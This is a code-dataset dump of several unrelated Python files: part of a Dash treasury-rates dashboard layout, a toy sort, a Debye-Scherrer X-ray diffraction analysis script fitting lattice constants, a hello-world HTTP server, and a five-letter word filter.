btn-outline-primary\",\n labelCheckedClassName=\"active\",\n options=[\n {\"label\": \"3m\", \"value\": '3m'},\n {\"label\": \"1y\", \"value\": '1y'},\n {\"label\": \"5y\", \"value\": '5y'},\n {\"label\": \"10y\", \"value\": '10y'},\n {\"label\": \"20y\", \"value\": '20y'},\n {\"label\": \"all\", \"value\": 'all'},\n ],\n value=1,\n ),\n html.Div(id=\"output\"),\n ],\n className=\"radio-group\",\n)\n\n\ntab1_content = html.Div(\n [\n date_input,\n tenors_input,\n interpolation_type_input,\n ]\n)\n\ntab2_content = html.Div(\n [\n period_input,\n html.P(\"todo: Checkboxes to select tenors like 3M, 2Y\", className=\"card-text\"),\n ],\n className=\"mt-3\"\n)\n\n\ntabs = dbc.Tabs(\n [\n dbc.Tab(tab1_content, label=\"PIT\"),\n dbc.Tab(tab2_content, label=\"Hist\"),\n ]\n)\n\nsidebar = html.Div(\n [\n html.H3(\"Treasury Rates\", className=\"display-6\"),\n rate_type_input,\n tabs,\n ],\n style=SIDEBAR_STYLE,\n)\n\ncontent = html.Div(id=\"page-content\", style=CONTENT_STYLE)\n\nlayout = html.Div([dcc.Location(id=\"url\"), sidebar, content])\n\n","repo_name":"atresearch/findash","sub_path":"src/pages/rates.py","file_name":"rates.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1245377504","text":"x=[1,3,5,2]\r\ny=[]\r\nxl = len(x)\r\nfor g in x[:]:\r\n max=0\r\n for i in x[:]:\r\n if i > max:\r\n max = i\r\n y.append(max)\r\n x.remove(max)\r\n\r\n\r\nprint(y)\r\nprint(x)","repo_name":"yvvvvvvvv/Scu_","sub_path":"Scu_Level1-1/ComputerScience/20211228/20211228_for.py","file_name":"20211228_for.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39117648093","text":"from scipy.optimize import curve_fit\nfrom scipy.signal import find_peaks\nfrom scipy.stats import sem\nfrom uncertainties import ufloat\nimport matplotlib.pyplot as plt\nfrom matplotlib import pylab\n\n'''\nImport millerindizes as miller from Auswertung/millerindizes.py with\nimportlib.util. Important to note is, that in the third line of this piece of\ncode the name of the module is definded for further use in the code.\n'''\nimport importlib.util\nspec = importlib.util.spec_from_file_location(\"millerindizes\", \"Auswertung/millerindizes.py\")\nmiller = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(miller)\n\nimport numpy as np\nimport pandas as pd\nplt.rcParams['figure.figsize'] = (10, 8)\nplt.rcParams['font.size'] = 18\n\n# Turn of pandas warnings... be carefull\npd.options.mode.chained_assignment = None\n\n\ndef linear(x, m, n):\n\n '''\n x: array of floats, values, for wich the duction has to be evaluated.\n m, n: floats, Parameter for the function.\n\n Simple linear function.\n\n Returns fuction values y=f(x).\n '''\n\n return m * x + n\n\n\ndef find_best_fit(evaluate_value, test_array, i):\n\n '''\n evaluate_value: float, value, for witch the best fitting value for n\n has to be evaluated.\n test_array: array of floats, possible values for evaluate_value\n i: int, index of currently evaluated PeakAngle\n\n Function to find the best fitting value, therfor the value, where the\n euclidian distance between evaluate_value and the evaluated test_array\n value is minimal. In other words, it just gives the lowest possible\n n, because the fundtion does not work like initially planned (due\n to a wrong implementation, to be honest). The reason it is not alterd\n is simply because it works.\n\n Returns best fit and distance to evaluated value (residuum res)\n '''\n\n # Initially, there should be a multiplication insted of a division.\n # But shit hits the fan if it is alterd that way.\n res = d[i] / np.abs(test_array - evaluate_value)\n best_fit = test_array[d[i] * np.abs(test_array - evaluate_value) ==\n d[i] * np.abs(test_array - evaluate_value).min()]\n best_res = res[d[i] * np.abs(test_array - evaluate_value) ==\n d[i] * np.abs(test_array - evaluate_value).min()]\n return best_fit[0], best_res[0]\n\n\ndef find_lattice_constants(d, lattice, max_value):\n\n '''\n d: array of floats, array of the interplanar distances\n lattice\n lattice: string, assumed lattice-type. Supported: bcc and fcc\n max_value: int, maximum value for h, k and l respectivly\n\n Funktion to find the best fitting millier indizes (h, k, l) and compute the\n lattice-constant a.\n\n Returns best fitting n = sqrt(h**2 + k**2 + l**2), the a for any n and\n mean a and its error.\n '''\n\n # Compute possible millerindizes for given lattice and max_value\n if lattice == \"bcc\":\n h, k, l = miller.bcc(max_value)\n elif lattice == \"fcc\":\n h, k, l = miller.fcc(max_value)\n elif lattice == \"Dia\":\n h, k, l = miller.Dia(max_value)\n elif lattice == \"CsCl\":\n h, k, l = miller.CsCl(max_value)\n elif lattice == \"ZnS\":\n h, k, l = miller.ZnS(max_value)\n elif lattice == \"F\":\n h, k, l = miller.F(max_value)\n elif lattice == \"NaCl\":\n h, k, l = miller.NaCl(max_value)\n else:\n print(\"No supported lattice-type given\")\n return\n\n # Compute denominator of latticeconstant formular\n n = np.sqrt(h**2 + k**2 + l**2)\n\n n = n[:len(d)]\n h = h[:len(d)]\n k = k[:len(d)]\n l = l[:len(d)]\n\n a = d * n\n return n, a\n\n\ndef find_hkl(lattice, n, max_value):\n\n '''\n lattice: string, assumed lattice-type. Supported: bcc and fcc\n n: float, sqrt(h**2 + k**2 + l**2)\n max_value: int, maximum value for h, k and l respectivly\n\n Funktion to find the corresponding millier indizes (h, k, l) to a n.\n\n Returns millerindizes.\n '''\n\n # Compute possible millerindizes for given lattice and max_value\n if lattice == \"bcc\":\n h, k, l = miller.bcc(max_value)\n elif lattice == \"fcc\":\n h, k, l = miller.fcc(max_value)\n elif lattice == \"Dia\":\n h, k, l = miller.Dia(max_value)\n elif lattice == \"CsCl\":\n h, k, l = miller.CsCl(max_value)\n elif lattice == \"ZnS\":\n h, k, l = miller.ZnS(max_value)\n elif lattice == \"F\":\n h, k, l = miller.F(max_value)\n elif lattice == \"NaCl\":\n h, k, l = miller.NaCl(max_value)\n else:\n print(\"No supported lattice-type given\")\n return\n\n # Compute denominator of latticeconstant formular\n n_lattice = np.sqrt(h**2 + k**2 + l**2)\n indizes = np.empty([1])\n\n # Compare given n to possible n\n for j in range(len(n)):\n for i in range(len(n_lattice)):\n if n[j] == n_lattice[i]:\n # Set found n to 0 to avoid multiple identification of\n # the same h, k, l-tuple\n n_lattice[i] = 0\n indizes = np.append(indizes, i)\n break\n\n indizes = np.delete(indizes, [0])\n print(indizes)\n indizes = indizes.astype('int')\n\n # Identify indizes\n mask = np.zeros(len(h), dtype=bool)\n mask[indizes] = True\n\n h = h[mask]\n k = k[mask]\n l = l[mask]\n\n return h, k, l\n\n\nif __name__ == '__main__':\n # Print a welcome text.\n print(\"Welcome pesant or creator, whatever holds true. If you are the \"\n \"author of these script, you can scip this lines. \"\n \"If not, you may find some muy bien importante informationes here: \"\n \"First of all, you will need to produce GreyValue \"\n \"Data for this script. \"\n \"We recommend the use of fiji (ImageJ), where the \"\n \"Analysis -> Plot Profile \"\n \"function gives yuo a GreyValue Plot whose data can \"\n \"be saved as .csv file. \"\n \"The best results are produced, if the films \"\n \"are scanned. It might be \"\n \"necessary to leave the scanner open and expose the film to light \"\n \"(e.g. like a flashlight). Second to that, you \"\n \"will need to adjust some \"\n \"lines in this script. They are marked with a blockcomment.\")\n print(\"------------------------------------------------------------------\")\n\n '''\n main-routine of the analysis. In here, data is beeing read in, peaks are\n computed and the latticeconstants are computed.\n For this, the functions above are called.\n '''\n # Metall-Probe\n # Import GreyValue Data. Keys: Pixel, GreyValue\n Metall = pd.read_csv(filepath_or_buffer=\"Auswertung/Bilder/Metall.csv\")\n Metall.name = \"Metall\"\n Salt = pd.read_csv(filepath_or_buffer=\"Auswertung/Bilder/Salz.csv\")\n Salt.name = \"Salt\"\n\n # Subtract underground\n Salt.GreyValue = -Salt.GreyValue\n Metall.GreyValue = -Metall.GreyValue\n\n '''\n Attention:\n In the following rows, it is indispensable to adjust the cut-of value\n inside the boolean statement of the mask to your needs.\n '''\n\n Salt.GreyValue[Salt.GreyValue < -175] = -175\n Metall.GreyValue[Metall.GreyValue < -18] = -18\n\n for idx, Probe in enumerate([Metall]):\n\n '''\n Attention:\n In the following rows, the summands 6 (this happens twice!)\n is used to correct for a black\n marker, placed inside the center of the punchholes of the film to\n simplify the selection of a alaysis-window in ImageJ .\n Since they were colored black, the could not be taken in account\n for the grayvalue messurement. To evoid an error through this, it\n is corrected by adding the thereby lost 6 pixels in the conversion.\n '''\n # Convert from Pixel to centimetre, distance mesuered to be 18 cm\n print(\"Just ignore this warning, it seems to be useless:\")\n Probe.Distance = Probe.Pixel * (18 / (len(Probe.Pixel) + 6))\n print(\"--------------------------------------------------------------\")\n\n print(Probe.name, \"probe\")\n\n # Find peaks\n ProbePeaks, props = find_peaks(x=Probe.GreyValue, prominence=2.5)\n\n # Use only dark peaks\n LightPeaks = ProbePeaks[props['prominences'] <= 10]\n # ProbePeaks = ProbePeaks[props['prominences'] > 10]\n\n GreyValuePeaks = np.array(Probe.GreyValue[ProbePeaks])\n GreyValueLightPeaks = np.array(Probe.GreyValue[LightPeaks])\n\n # correct for dual peaks due to k_alpha_1 and k_alpha_2\n Corr_peak = (ProbePeaks[0] + ProbePeaks[1]) / 2\n Corr_Grey_Value = (GreyValuePeaks[0] + GreyValuePeaks[1]) / 2\n\n ProbePeaks = np.delete(ProbePeaks, [0, 1])\n GreyValuePeaks = np.delete(GreyValuePeaks, [0, 1])\n\n ProbePeaks = np.insert(ProbePeaks, [0], Corr_peak)\n GreyValuePeaks = np.insert(GreyValuePeaks, [0], Corr_Grey_Value)\n\n # Get Distance from peaks\n ProbePeaks = ProbePeaks * (18 / (len(Probe.Pixel) + 6))\n LightPeaks = LightPeaks * (18 / (len(Probe.Pixel) + 6))\n\n # Plot peaks\n plt.figure()\n plt.plot(Probe.Distance, Probe.GreyValue, ls='--', color='blue',\n label=\"Grauwert\")\n plt.plot(ProbePeaks, GreyValuePeaks, color='black',\n ls='', marker='o', label=\"Erkannte Peaks\")\n # plt.plot(LightPeaks, GreyValueLightPeaks, color='grey',\n # ls='', marker='o', label=\"Erkannte, schwache Peaks\")\n plt.xlabel(r\"$r / \\mathrm{cm}$\")\n plt.ylabel('inverser Grauwert')\n plt.xlim(0, 18)\n plt.legend(loc=\"lower left\")\n plt.tight_layout\n plt.savefig(\"Auswertung/Grafiken/\" + Probe.name + \"_Peaks.pdf\")\n\n # Distance is equal to 180° -> 1cm equals 10°\n # Bragg: 2dsin(theta)=n*lambda\n # lambda = 1.54093A\n # Angles have to be reverted, cause they have to be mesured acording to\n # the MP-vector\n\n lam = 1.54093 * 10**(-10)\n R = 57.3 * 10**(-3)\n\n PeakAngle = ProbePeaks * 10\n '''\n Attention:\n We had to invert the film in the next rows.\n Check if you need to do this.\n '''\n PeakAngle = np.abs(180 - PeakAngle)\n PeakAngle = np.sort(PeakAngle)\n\n # convert the angles to interplanar distance according to braggs law\n d = lam / (2 * np.sin(0.5 * PeakAngle * np.pi / 180))\n\n print(\"bcc n=sqrt(h**2+k**2+l**2):\")\n bcc_n, bcc_a = find_lattice_constants(d, 'bcc', 7)\n print(bcc_n)\n print('bcc h, k, l:')\n bcc_h, bcc_k, bcc_l = find_hkl('bcc', bcc_n, 7)\n print(bcc_h, bcc_k, bcc_l)\n print(\"bcc a:\")\n print(bcc_a)\n print(\"fcc n=sqrt(h**2+k**2+l**2):\")\n fcc_n, fcc_a = find_lattice_constants(d, 'fcc', 7)\n print(fcc_n)\n print('fcc h, k, l:')\n fcc_h, fcc_k, fcc_l = find_hkl('fcc', fcc_n, 7)\n print(fcc_h, fcc_k, fcc_l)\n print(\"fcc a:\")\n print(fcc_a)\n print(\"Dia n=sqrt(h**2+k**2+l**2):\")\n Dia_n, Dia_a = find_lattice_constants(d, 'Dia', 7)\n print(Dia_n)\n print('Dia h, k, l:')\n Dia_h, Dia_k, Dia_l = find_hkl('Dia', Dia_n, 7)\n print(Dia_h, Dia_k, Dia_l)\n print(\"Dia a:\")\n print(Dia_a)\n\n np.savetxt(\"Auswertung/Grafiken/\" + Probe.name +\n \"_bcc_Tabelle.tex\",\n np.column_stack([\n PeakAngle,\n bcc_n**2,\n bcc_h,\n bcc_k,\n bcc_l,\n bcc_a * 10**(12),\n ]), delimiter=' & ', newline=r' \\\\' + '\\n',\n fmt='%.2f & %.0f & %.0f & %.0f & %.0f & %.2f')\n\n np.savetxt(\"Auswertung/Grafiken/\" + Probe.name +\n \"_fcc_Tabelle.tex\",\n np.column_stack([\n PeakAngle,\n fcc_n**2,\n fcc_h,\n fcc_k,\n fcc_l,\n fcc_a * 10**(12),\n ]), delimiter=' & ', newline=r' \\\\' + '\\n',\n fmt='%.2f & %.0f & %.0f & %.0f & %.0f & %.2f')\n\n np.savetxt(\"Auswertung/Grafiken/\" + Probe.name +\n \"_Dia_Tabelle.tex\",\n np.column_stack([\n PeakAngle,\n Dia_n**2,\n Dia_h,\n Dia_k,\n Dia_l,\n Dia_a * 10**(12),\n ]), delimiter=' & ', newline=r' \\\\' + '\\n',\n fmt='%.2f & %.0f & %.0f & %.0f & %.0f & %.2f')\n\n np.savetxt(\"Auswertung/Grafiken/\" + Probe.name +\n \"_Tabelle.tex\",\n np.column_stack([\n PeakAngle,\n bcc_n**2,\n bcc_h,\n bcc_k,\n bcc_l,\n bcc_a * 10**(12),\n fcc_n**2,\n fcc_h,\n fcc_k,\n fcc_l,\n fcc_a * 10**(12),\n ]), delimiter=' & ', newline=r' \\\\' + '\\n',\n fmt='%.2f & %.0f & %.0f & %.0f & %.0f & %.2f & %.0f & %.0f & %.0f & %.0f & %.2f')\n\n # Compute best_fit for a thrugh linear regression\n bcc_params, cov = curve_fit(linear, np.cos(0.5 * PeakAngle * np.pi /\n 180)**2, bcc_a)\n bcc_errors = np.sqrt(np.diag(cov))\n m_bcc = ufloat(bcc_params[0], bcc_errors[0])\n n_bcc = ufloat(bcc_params[1], bcc_errors[1])\n\n fcc_params, cov = curve_fit(linear, np.cos(0.5 * PeakAngle * np.pi /\n 180)**2, fcc_a)\n fcc_errors = np.sqrt(np.diag(cov))\n m_fcc = ufloat(fcc_params[0], fcc_errors[0])\n n_fcc = ufloat(fcc_params[1], fcc_errors[1])\n\n Dia_params, cov = curve_fit(linear, np.cos(0.5 * PeakAngle * np.pi /\n 180)**2, Dia_a)\n Dia_errors = np.sqrt(np.diag(cov))\n m_Dia = ufloat(Dia_params[0], Dia_errors[0])\n n_Dia = ufloat(Dia_params[1], Dia_errors[1])\n\n print(\"bcc best fit:\")\n print(\"m = \", m_bcc, \", n = \", n_bcc)\n print(\"fcc best fit:\")\n print(\"m = \", m_fcc, \", n = \", n_fcc)\n print(\"Dia best fit:\")\n print(\"m = \", m_Dia, \", n = \", n_Dia)\n\n x_range = np.linspace(0, 90, 1000)\n x_range = np.cos(x_range * np.pi / 180)**2\n\n # Plot peaks\n plt.figure()\n plt.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, fcc_a * 10**(12),\n marker='x', color='blue', ls='')\n plt.plot(x_range, linear(x_range, *fcc_params) * 10**(12),\n ls='-', color='blue', label='Hypothese: fcc-Gitter')\n plt.xlabel(r\"$\\cos{(\\phi)}^{2}$\")\n plt.ylabel(r'Berechnete Gitterkonstante$ / \\mathrm{pm}$')\n plt.legend(loc=\"best\")\n plt.xlim(0, 1)\n plt.tight_layout\n plt.savefig(\"Auswertung/Grafiken/\" +\n Probe.name + \"_fcc_Ausgleichsrechnung.pdf\")\n\n plt.figure()\n plt.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, bcc_a * 10**(12),\n marker='x', color='red', ls='')\n plt.plot(x_range, linear(x_range, *bcc_params) * 10**(12),\n ls='-', color='red', label='Hypothese: bcc-Gitter')\n plt.xlabel(r\"$\\cos{(\\phi)}^{2}$\")\n plt.ylabel(r'Berechnete Gitterkonstante$ / \\mathrm{pm}$')\n plt.legend(loc=\"best\")\n plt.xlim(0, 1)\n plt.tight_layout\n plt.savefig(\"Auswertung/Grafiken/\" +\n Probe.name + \"_bcc_Ausgleichsrechnung.pdf\")\n plt.figure()\n plt.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, bcc_a * 10**(12),\n marker='x', color='red', ls='')\n plt.plot(x_range, linear(x_range, *bcc_params) * 10**(12),\n ls='-', color='red', label='Hypothese: bcc-Gitter')\n plt.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, fcc_a * 10**(12),\n marker='x', color='blue', ls='')\n plt.plot(x_range, linear(x_range, *fcc_params) * 10**(12),\n ls='-', color='blue', label='Hypothese: fcc-Gitter')\n # plt.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, Dia_a * 10**(12),\n # marker='x', color='green', ls='')\n # plt.plot(x_range, linear(x_range, *Dia_params) * 10**(12),\n # ls='-', color='green', label='Hypothese: Dia-Gitter')\n plt.xlabel(r\"$\\cos{(\\phi)}^{2}$\")\n plt.ylabel(r'Berechnete Gitterkonstante$ / \\mathrm{pm}$')\n plt.legend(loc=\"best\")\n plt.xlim(0, 1)\n plt.tight_layout\n plt.savefig(\"Auswertung/Grafiken/\" +\n Probe.name + \"_Ausgleichsrechnung.pdf\")\n\nfor idx, Probe in enumerate([Salt]):\n\n '''\n Attention:\n In the following rows, the summands 6 (this happens twice!)\n is used to correct for a black\n marker, placed inside the center of the punchholes of the film to\n simplify the selection of a alaysis-window in ImageJ .\n Since they were colored black, the could not be taken in account\n for the grayvalue messurement. To evoid an error through this, it\n is corrected by adding the thereby lost 6 pixels in the conversion.\n '''\n # Convert from Pixel to centimetre, distance mesuered to be 18 cm\n print(\"Just ignore this warning, it seems to be useless:\")\n Probe.Distance = Probe.Pixel * (18 / (len(Probe.Pixel) + 6))\n print(\"--------------------------------------------------------------\")\n\n print(Probe.name, \"probe\")\n\n # Find peaks\n ProbePeaks, props = find_peaks(x=Probe.GreyValue, prominence=2.5)\n\n # Use only dark peaks\n LightPeaks = ProbePeaks[props['prominences'] <= 10]\n # ProbePeaks = ProbePeaks[props['prominences'] > 10]\n\n GreyValuePeaks = np.array(Probe.GreyValue[ProbePeaks])\n GreyValueLightPeaks = np.array(Probe.GreyValue[LightPeaks])\n\n # correct for dual peaks due to k_alpha_1 and k_alpha_2\n Corr_peak = (ProbePeaks[0] + ProbePeaks[1]) / 2\n Corr_Grey_Value = (GreyValuePeaks[0] + GreyValuePeaks[1]) / 2\n\n ProbePeaks = np.delete(ProbePeaks, [0, 1])\n GreyValuePeaks = np.delete(GreyValuePeaks, [0, 1])\n\n ProbePeaks = np.insert(ProbePeaks, [0], Corr_peak)\n GreyValuePeaks = np.insert(GreyValuePeaks, [0], Corr_Grey_Value)\n\n # Get Distance from peaks\n ProbePeaks = ProbePeaks * (18 / (len(Probe.Pixel) + 6))\n LightPeaks = LightPeaks * (18 / (len(Probe.Pixel) + 6))\n\n # GreyValuePeaks = GreyValuePeaks[:11]\n # ProbePeaks = ProbePeaks[:11]\n\n # Plot peaks\n plt.figure()\n plt.plot(Probe.Distance, Probe.GreyValue, ls='--', color='blue',\n label=\"Grauwert\")\n plt.plot(ProbePeaks, GreyValuePeaks, color='black',\n ls='', marker='o', label=\"Erkannte Peaks\")\n # plt.plot(LightPeaks, GreyValueLightPeaks, color='grey',\n # ls='', marker='o', label=\"Erkannte, schwache Peaks\")\n plt.xlabel(r\"$r / \\mathrm{cm}$\")\n plt.ylabel('inverser Grauwert')\n plt.xlim(0, 18)\n plt.legend(loc=\"lower left\")\n plt.tight_layout\n plt.savefig(\"Auswertung/Grafiken/\" + Probe.name + \"_Peaks.pdf\")\n\n # Distance is equal to 180° -> 1cm equals 10°\n # Bragg: 2dsin(theta)=n*lambda\n # lambda = 1.54093A\n # Angles have to be reverted, cause they have to be mesured acording to\n # the MP-vector\n\n lam = 1.54093 * 10**(-10)\n R = 57.3 * 10**(-3)\n\n PeakAngle = ProbePeaks * 10\n '''\n Attention:\n We had to invert the film in the next rows.\n Check if you need to do this.\n '''\n PeakAngle = np.abs(180 - PeakAngle)\n print(PeakAngle)\n PeakAngle = np.sort(PeakAngle)\n print(PeakAngle)\n\n # convert the angles to interplanar distance according to braggs law\n d = lam / (2 * np.sin(0.5 * PeakAngle * np.pi / 180))\n\n print(\"ZnS n=sqrt(h**2+k**2+l**2):\")\n ZnS_n, ZnS_a = find_lattice_constants(d, 'ZnS', 7)\n print(ZnS_n)\n print('ZnS h, k, l:')\n ZnS_h, ZnS_k, ZnS_l = find_hkl('ZnS', ZnS_n, 7)\n print(ZnS_h, ZnS_k, ZnS_l)\n print(\"ZnS a:\")\n print(ZnS_a)\n print(\"CsCl n=sqrt(h**2+k**2+l**2):\")\n CsCl_n, CsCl_a = find_lattice_constants(d, 'CsCl', 7)\n print(CsCl_n)\n print('CsCl h, k, l:')\n CsCl_h, CsCl_k, CsCl_l = find_hkl('CsCl', CsCl_n, 7)\n print(CsCl_h, CsCl_k, CsCl_l)\n print(\"CsCl a:\")\n print(CsCl_a)\n print(\"NaCl n=sqrt(h**2+k**2+l**2):\")\n NaCl_n, NaCl_a = find_lattice_constants(d, 'NaCl', 7)\n print(NaCl_n)\n print('NaCl h, k, l:')\n NaCl_h, NaCl_k, NaCl_l = find_hkl('NaCl', NaCl_n, 7)\n print(NaCl_h, NaCl_k, NaCl_l)\n print(\"NaCl a:\")\n print(NaCl_a)\n print(\"F n=sqrt(h**2+k**2+l**2):\")\n F_n, F_a = find_lattice_constants(d, 'F', 7)\n print(F_n)\n print('F h, k, l:')\n F_h, F_k, F_l = find_hkl('F', F_n, 7)\n print(F_h, F_k, F_l)\n print(\"F a:\")\n print(F_a)\n\n np.savetxt(\"Auswertung/Grafiken/\" + Probe.name +\n \"_ZnS_CsCl_Tabelle.tex\",\n np.column_stack([\n PeakAngle,\n ZnS_n**2,\n ZnS_h,\n ZnS_k,\n ZnS_l,\n ZnS_a * 10**(12),\n CsCl_n**2,\n CsCl_h,\n CsCl_k,\n CsCl_l,\n CsCl_a * 10**(12),\n ]), delimiter=' & ', newline=r' \\\\' + '\\n',\n fmt='%.2f & %.0f & %.0f & %.0f & %.0f & %.2f & %.0f & %.0f & %.0f & %.0f & %.2f')\n np.savetxt(\"Auswertung/Grafiken/\" + Probe.name +\n \"_NaCl_F_Tabelle.tex\",\n np.column_stack([\n PeakAngle,\n NaCl_n**2,\n NaCl_h,\n NaCl_k,\n NaCl_l,\n NaCl_a * 10**(12),\n F_n**2,\n F_h,\n F_k,\n F_l,\n F_a * 10**(12),\n ]), delimiter=' & ', newline=r' \\\\' + '\\n',\n fmt='%.2f & %.0f & %.0f & %.0f & %.0f & %.2f & %.0f & %.0f & %.0f & %.0f & %.2f')\n\n # Compute best_fit for a thrugh linear regression\n ZnS_params, cov = curve_fit(linear, np.cos(0.5 * PeakAngle * np.pi /\n 180)**2, ZnS_a)\n ZnS_errors = np.sqrt(np.diag(cov))\n m_ZnS = ufloat(ZnS_params[0], ZnS_errors[0])\n n_ZnS = ufloat(ZnS_params[1], ZnS_errors[1])\n\n CsCl_params, cov = curve_fit(linear, np.cos(0.5 * PeakAngle * np.pi /\n 180)**2, CsCl_a)\n CsCl_errors = np.sqrt(np.diag(cov))\n m_CsCl = ufloat(CsCl_params[0], CsCl_errors[0])\n n_CsCl = ufloat(CsCl_params[1], CsCl_errors[1])\n\n NaCl_params, cov = curve_fit(linear, np.cos(0.5 * PeakAngle * np.pi /\n 180)**2, NaCl_a)\n NaCl_errors = np.sqrt(np.diag(cov))\n m_NaCl = ufloat(NaCl_params[0], NaCl_errors[0])\n n_NaCl = ufloat(NaCl_params[1], NaCl_errors[1])\n\n F_params, cov = curve_fit(linear, np.cos(0.5 * PeakAngle * np.pi /\n 180)**2, F_a)\n F_errors = np.sqrt(np.diag(cov))\n m_F = ufloat(F_params[0], F_errors[0])\n n_F = ufloat(F_params[1], F_errors[1])\n\n print(\"ZnS best fit:\")\n print(\"m = \", m_ZnS, \", n = \", n_ZnS)\n print(\"CsCl best fit:\")\n print(\"m = \", m_CsCl, \", n = \", n_CsCl)\n print(\"NaCl best fit:\")\n print(\"m = \", m_NaCl, \", n = \", n_NaCl)\n print(\"F best fit:\")\n print(\"m = \", m_F, \", n = \", n_F)\n\n x_range = np.linspace(0, 90, 1000)\n x_range = np.cos(x_range * np.pi / 180)**2\n\n # Plot peaks\n plt.figure()\n plt.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, ZnS_a * 10**(12),\n marker='x', color='blue', ls='')\n plt.plot(x_range, linear(x_range, *ZnS_params) * 10**(12),\n ls='-', color='blue', label='Hypothese: ZnS-Gitter')\n plt.xlabel(r\"$\\cos{(\\phi)}^{2}$\")\n plt.ylabel(r'Berechnete Gitterkonstante$ / \\mathrm{pm}$')\n plt.legend(loc=\"best\")\n plt.xlim(0, 1)\n plt.tight_layout\n plt.savefig(\"Auswertung/Grafiken/\" +\n Probe.name + \"_ZnS_Ausgleichsrechnung.pdf\")\n\n plt.figure()\n plt.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, CsCl_a * 10**(12),\n marker='x', color='green', ls='')\n plt.plot(x_range, linear(x_range, *CsCl_params) * 10**(12),\n ls='-', color='green', label='Hypothese: CsCl-Gitter')\n plt.xlabel(r\"$\\cos{(\\phi)}^{2}$\")\n plt.ylabel(r'Berechnete Gitterkonstante$ / \\mathrm{pm}$')\n plt.legend(loc=\"best\")\n plt.xlim(0, 1)\n plt.tight_layout\n plt.savefig(\"Auswertung/Grafiken/\" +\n Probe.name + \"_CsCl_Ausgleichsrechnung.pdf\")\n\n plt.figure()\n plt.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, NaCl_a * 10**(12),\n marker='x', color='orange', ls='')\n plt.plot(x_range, linear(x_range, *NaCl_params) * 10**(12),\n ls='-', color='orange', label='Hypothese: NaCl-Gitter')\n plt.xlabel(r\"$\\cos{(\\phi)}^{2}$\")\n plt.ylabel(r'Berechnete Gitterkonstante$ / \\mathrm{pm}$')\n plt.legend(loc=\"best\")\n plt.xlim(0, 1)\n plt.tight_layout\n plt.savefig(\"Auswertung/Grafiken/\" +\n Probe.name + \"_NaCl_Ausgleichsrechnung.pdf\")\n\n plt.figure()\n plt.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, F_a * 10**(12),\n marker='x', color='black', ls='')\n plt.plot(x_range, linear(x_range, *F_params) * 10**(12),\n ls='-', color='black', label='Hypothese: F-Gitter')\n plt.xlabel(r\"$\\cos{(\\phi)}^{2}$\")\n plt.ylabel(r'Berechnete Gitterkonstante$ / \\mathrm{pm}$')\n plt.legend(loc=\"best\")\n plt.xlim(0, 1)\n plt.tight_layout\n plt.savefig(\"Auswertung/Grafiken/\" +\n Probe.name + \"_F_Ausgleichsrechnung.pdf\")\n\n fig = plt.figure()\n ax = plt.subplot(111)\n ax.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, ZnS_a * 10**(12),\n marker='x', color='blue', ls='')\n ax.plot(x_range, linear(x_range, *ZnS_params) * 10**(12),\n ls='-', color='blue', label='Hypothese: ZnS-Gitter')\n ax.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, CsCl_a * 10**(12),\n marker='x', color='green', ls='')\n ax.plot(x_range, linear(x_range, *CsCl_params) * 10**(12),\n ls='-', color='green', label='Hypothese: CsCl-Gitter')\n ax.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, NaCl_a * 10**(12),\n marker='x', color='orange', ls='')\n ax.plot(x_range, linear(x_range, *NaCl_params) * 10**(12),\n ls='-', color='orange', label='Hypothese: NaCl-Gitter')\n ax.plot(np.cos(PeakAngle * 0.5 * np.pi / 180)**2, F_a * 10**(12),\n marker='x', color='black', ls='')\n ax.plot(x_range, linear(x_range, *F_params) * 10**(12),\n ls='-', color='black', label='Hypothese: F-Gitter')\n ax.set_xlabel(r\"$\\cos{(\\phi)}^{2}$\")\n ax.set_ylabel(r'Berechnete Gitterkonstante$ / \\mathrm{pm}$')\n art = []\n lgd = pylab.legend(loc=\"upper center\", bbox_to_anchor=(0.5, -0.1), ncol=2)\n art.append(lgd)\n ax.set_xlim(0, 1)\n plt.tight_layout\n pylab.savefig(\"Auswertung/Grafiken/\" +\n Probe.name + \"_Ausgleichsrechnung.pdf\",\n additional_artists=art,\n bbox_inches=\"tight\")\n\nprint(\"------------------------------------------------------------------\")\nprint('Thats all folks!')\n","repo_name":"FeGeyer/praktikum","sub_path":"MFP/DebyeV41/auswertung.py","file_name":"auswertung.py","file_ext":"py","file_size_in_byte":27907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27557763147","text":"#!/usr/bin/python3\nimport os\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n\nmessage = os.getenv('APPENV', 'Default Hello World!')\n\nclass handler(BaseHTTPRequestHandler):\n\n def do_GET(self):\n self.send_response(200)\n self.send_header('Content-type','text/html')\n self.end_headers()\n\n self.wfile.write(bytes(message, \"utf8\"))\n\nprint(\"I will show you message:\", message)\n\nwith HTTPServer(('', 8080), handler) as server:\n server.serve_forever()\n","repo_name":"apoczekalewicz/app-python-helloworld","sub_path":"src/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73643612035","text":"from ctypes import sizeof\nimport sys\n\nfname = sys.argv[1];\nfname_filter = fname + \".wslv\"\nwith open(fname) as f:\n with open(fname_filter,\"w\") as ff:\n for line in f:\n sline = line.rstrip()\n if(len(sline) == 5):\n ff.write(sline.lower())\n 